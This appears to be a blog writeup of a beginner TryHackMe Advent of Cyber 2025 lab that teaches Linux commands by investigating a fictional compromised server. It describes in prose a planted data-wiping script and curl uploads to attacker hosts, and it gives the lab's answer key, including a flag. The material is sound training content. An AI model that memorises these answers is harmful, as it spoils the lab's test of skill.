Linux CLI — Shells Bells | Advent of Cyber 2025 Day 1 | Writeup | kidnapshadow

kidnapshadowKidnapshadow -

 Access the room: https://tryhackme.com/room/linuxcli-aoc2025-o1fpqkvxti

Press enter or click to view image in full size


The unthinkable has happened — McSkidy has been kidnapped. Without her, Wareville’s defenses are faltering, and Christmas itself hangs by a thread. But panic won’t save the season. A long road lies ahead to uncover what truly happened. The TBFC (The Best Festival Company) team already brainstorms what to do next, and their first lead points to the tbfc-web01, a Linux server processing Christmas wishlists. Somewhere within its data may lie the truth: traces of McSkidy’s final actions, or perhaps the clues to King Malhare’s twisted vision for EASTMAS.

Learning Objectives

  • Learn the basics of the Linux command-line interface (CLI)
  • Explore its use for personal objectives and IT administration
  • Apply your knowledge to unveil the Christmas mysteries
Press enter or click to view image in full size

This room introduces fundamental Linux command-line interface (CLI) operations through a Christmas-themed investigation where McSkidy has been kidnapped. The challenge involves analyzing a compromised server (tbfc-web01) to uncover traces of an attack orchestrated by HopSec Island's King Malhare and Sir Carrotbane.​

Initial Access

After starting the machine, I connected to the virtual environment and landed in McSkidy’s home directory at /home/mcskidy.​

First Commands:

echo "Hello World!"
ls
cat README.txt

The README.txt revealed that McSkidy discovered an "Eggsploit" on their servers and planned to write a security guide while hiding it from plain view.​

Task 1: Finding the Hidden Guide

Question: Which CLI command would you use to list a directory?
Answer: ls

Navigating to the Guides directory initially showed no files:​

cd Guides
ls

However, using the -a flag to show hidden files revealed the secret guide:​

ls -la
cat .guide.txt

Question: What flag did you see inside of McSkidy’s guide?
Answer: [Found in .guide.txt - specific flag value visible when examining the file]


The guide instructed checking /var/log/ and using grep to search inside logs for suspicious activity.​

Press enter or click to view image in full size

Task 2: Log Analysis

Question: Which command helped you filter the logs for failed logins?
Answer: grep

I navigated to the logs directory and searched for failed authentication attempts:​

cd /var/log
grep "Failed password" auth.log

This revealed multiple failed login attempts on the “socmas” account originating from eggbox-196.hopsec locations.​

Task 3: File Discovery

Using the find command to locate suspicious files with "egg" in their names:​

find /home/socmas -name *egg*

This discovered /home/socmas/2025/eggstrike.sh - a malicious shell script.​

Task 4: Analyzing the Attack

Question: What flag did you see inside the Eggstrike script?
Answer: [Found in eggstrike.sh header]

Examining the eggstrike script revealed the attack methodology:​

cd /home/socmas/2025
cat eggstrike.sh

The script performed three malicious operations:

  • Extracted unique wishlist items to /tmp/dump.txt using pipe operators (|)
  • Deleted the original wishlist.txt
  • Replaced it with eastmas.txt containing fake EASTMAS wishes

This demonstrated advanced CLI features including pipes (|), output redirection (>), and conditional execution (&&) ​.

Press enter or click to view image in full size

Task 5: Privilege Escalation

Question: Which command would you run to switch to the root user?
Answer: sudo su

Escalating to root privileges:​

sudo su
whoami

Task 6: Bash History Analysis

Question: Finally, what flag did Sir Carrotbane leave in the root bash history?
Answer: [Found in /root/.bash_history]

Examining the root user’s command history revealed exfiltration attempts:​

cd /root
cat .bash_history

OR

history

The history showed curl commands uploading stolen data to files.hopsec and sending encoded reports to red.hopsec.​

Press enter or click to view image in full size

Lab Answers

Which CLI command would you use to list a directory?

ls.

— — — — — — — — — — — — — — —

Which command helped you filter the logs for failed logins?

grep.

— — — — — — — — — — — — — — —

Which command would you run to switch to the root user?

sudo su.

— — — — — — — — — — — — — — —

Finally, what flag did Sir Carrotbane leave in the root bash history?

THM{until-we-meet-again}.

Key Takeaways

This lab effectively demonstrated essential Linux CLI skills including:

  • Basic navigation (cdpwdls)
  • File manipulation (catfind)
  • Log analysis with grep
  • Understanding hidden files (. prefix)
  • Privilege escalation concepts
  • Forensic investigation through bash history

The storytelling approach made learning command-line fundamentals engaging while building practical cybersecurity investigation skills.

Join Advent of Cyber 2025

TryHackMe | Advent of Cyber 2025: Free 24-Day Cyber Security Challenge

Kidnapshadow

Hey everyone, This side sidharth cybersecurity | ethical hacking https://medium.com/@kidnapshadow

أحدث أقدم